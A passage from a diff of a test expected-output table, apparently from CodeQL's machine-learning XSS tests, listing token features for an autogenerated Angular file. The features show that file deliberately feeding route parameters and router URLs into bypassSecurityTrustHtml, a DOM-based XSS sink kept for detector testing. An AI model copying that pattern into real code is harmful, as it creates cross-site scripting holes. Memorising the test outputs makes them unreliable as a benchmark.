subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:27:77:27:81 | 'foo' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | exceptional return of this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | exceptional return of this.sa ... 'foo')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | exceptional return of this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | exceptional return of this.sa ... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | exceptional return of this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | this.sa ... 'foo')) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | this.sa ... 'foo')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | this.sa ... 'foo')) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | this.sa ... 'foo')) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:5:28:88 | this.sa ... 'foo')) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:10:28:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:10:28:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:10:28:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:10:28:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:10:28:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:20:28:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:20:28:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:20:28:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:20:28:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:20:28:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:76 | this.ro ... aramMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:76 | this.ro ... aramMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:76 | this.ro ... aramMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:76 | this.ro ... aramMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:76 | this.ro ... aramMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:80 | this.ro ... Map.get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:80 | this.ro ... Map.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:80 | this.ro ... Map.get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:80 | this.ro ... Map.get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:80 | this.ro ... Map.get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | exceptional return of this.ro ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | exceptional return of this.ro ... ('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | exceptional return of this.ro ... ('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | exceptional return of this.ro ... ('foo') | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | exceptional return of this.ro ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11991,6 +91149,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:44:28:87 | this.ro ... ('foo') | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:49:28:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:49:28:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:49:28:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:49:28:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:49:28:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:55:28:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:55:28:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:55:28:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:55:28:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:55:28:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:64:28:76 | queryParamMap | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:64:28:76 | queryParamMap | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:64:28:76 | queryParamMap | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:64:28:76 | queryParamMap | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:64:28:76 | queryParamMap | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:78:28:80 | get | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:78:28:80 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:78:28:80 | get | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:78:28:80 | get | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:28:78:28:80 | get | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | CalleeFlexibleAccessPath | this.route.snapshot.queryParamMap.get | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11998,6 +91176,71 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:28:82:28:86 | 'foo' | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:29:5:29:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| 